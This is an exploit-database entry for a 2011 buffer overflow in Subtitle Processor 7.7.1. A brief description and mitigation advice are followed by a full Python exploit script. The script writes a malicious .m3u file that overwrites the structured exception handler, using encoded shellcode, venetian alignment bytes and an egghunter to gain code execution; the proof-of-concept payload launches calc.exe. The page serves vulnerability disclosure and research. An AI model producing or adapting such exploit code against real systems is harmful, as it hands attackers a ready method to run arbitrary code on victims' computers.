Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow

vendor:

Subtitle Processor

by:

Brandon Murphy

N/A

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Subtitle Processor

Affected Version From: 7.7.2001

Affected Version To: 7.7.2001

Patch Exists: NO

Related CWE:

CPE: a:subtitle_processor:subtitle_processor:7.7.1

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Pro SP3

2011

Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow

This exploit takes advantage of a buffer overflow vulnerability in Subtitle Processor version 7.7.1. By sending a specially crafted Unicode buffer, an attacker can overwrite the Structured Exception Handler (SEH) and gain control of the program's execution flow. The exploit includes a shellcode that executes the Windows calculator (calc.exe) as a proof of concept.

Mitigation:

The vendor should release a patch or update to fix the buffer overflow vulnerability in Subtitle Processor. In the meantime, users can mitigate the risk by avoiding opening subtitle files from untrusted sources.

Source

Exploit-DB raw data:

#!/usr/bin/python
# I wanted to first of all thank all the people who took the time to help me.
# Peter Van Eeckhoutte AKA corelanc0d3r. Awesome tutorials and thanks for putting up with me!
# Jason Kratzer. Thanks a lot for helping me finish this exploit and showing me techniques!
# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow
# Download: http://sourceforge.net/projects/subtitleproc/
# Version 7.7.1
# Author: Brandon Murphy
# Tested on Windows XP Pro SP3
# Author notified of vulnerability by email 12/11/2010
# No reply from author: Released exploit to public 4/26/2011

print "#=========================================================#"
print "#  Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow   #"
print "# Vulnerability found & exploit written by Brandon Murphy #"
print "#                Fallow: @MK1234Tfan                      #"
print "#=========================================================#"

junk = "\x41" * 70
tag = "s1cks1ck"

# msfpayload windows/exec CMD=calc.exe 496
shellcode = ("\x89\xe5\xdd\xc2\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x43\x30"
"\x45\x50\x45\x50\x45\x30\x4b\x39\x5a\x45\x50\x31\x58\x52\x43"
"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x51\x42\x52\x34\x4c\x4b\x54\x32\x56\x48\x54\x4f\x4e\x57\x51"
"\x5a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x45\x52\x56\x4c\x51\x30\x49\x51\x58\x4f\x54"
"\x4d\x43\x31\x58\x47\x4b\x52\x5a\x50\x56\x32\x50\x57\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x45\x51\x58\x50\x4c"
"\x4b\x47\x30\x43\x48\x4c\x45\x4f\x30\x43\x44\x51\x5a\x43\x31"
"\x58\x50\x50\x50\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
"\x50\x45\x51\x49\x43\x4b\x53\x47\x4c\x51\x59\x4c\x4b\x50\x34"
"\x4c\x4b\x45\x51\x49\x46\x56\x51\x4b\x4f\x50\x31\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x49\x57\x50\x38\x4b\x50"
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56"
"\x44\x54\x35\x5a\x42\x51\x48\x4c\x4b\x50\x58\x51\x34\x45\x51"
"\x58\x53\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48\x45"
"\x4c\x43\x31\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x4e\x30"
"\x4b\x39\x51\x54\x47\x54\x51\x34\x51\x4b\x51\x4b\x43\x51\x50"
"\x59\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a"
"\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x4a\x43\x31\x4c"
"\x4d\x4d\x55\x4f\x49\x43\x30\x45\x50\x43\x30\x50\x50\x43\x58"
"\x50\x31\x4c\x4b\x52\x4f\x4b\x37\x4b\x4f\x4e\x35\x4f\x4b\x5a"
"\x50\x4e\x55\x4f\x52\x50\x56\x43\x58\x49\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x54\x4a\x4d"
"\x50\x4b\x4b\x4b\x50\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53"
"\x54\x32\x52\x4f\x43\x5a\x43\x30\x51\x43\x4b\x4f\x49\x45\x52"
"\x43\x43\x51\x52\x4c\x45\x33\x56\x4e\x52\x45\x52\x58\x45\x35"
"\x43\x30\x41\x41")

junk2 = "\x41" * 3531
nseh = "\x61\x62"

# ppr 005700b4 Subtitleprocessor.exe
seh = "\xb4\x57"

# Venetian
# Align:
# add byte ptr [esi],ch - \x6e
# pop ebp -               \x55
# add byte ptr [esi],ch - \x6e
# pop eax -               \x58
# add byte ptr [esi],ch - \x6e
# add eax,0x11001400 -    \x05\x14\x11
# add byte ptr [esi],ch - \x6e
# sub eax,0x11001300 -    \x2d\x13\x11
# add byte ptr [esi],ch - \x6e
#
# Jump:
# push eax - \x50
# add byte ptr [esi],ch - \x6e
# ret - \xc3

align = "\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e"
jmp = "\x50\x6e\xc3"
junk3 = "\x44" * 108
egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58A"
"APAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO0B0R1ZKR0X8MNNOLKU0Z2TJO6X2S011S2K4KJZ6O2U9Z6O2U9WKO9WKPA")

payload = junk + tag + shellcode + junk2 + nseh + seh + align + jmp + junk3 + egghunter
try:
    make = open("exploit.m3u",'w')
    make.write(payload)
    make.close()
    print "[+] Go Go Gadget SEH unicode!"
except:
    print "[-] Something went wrong...</3"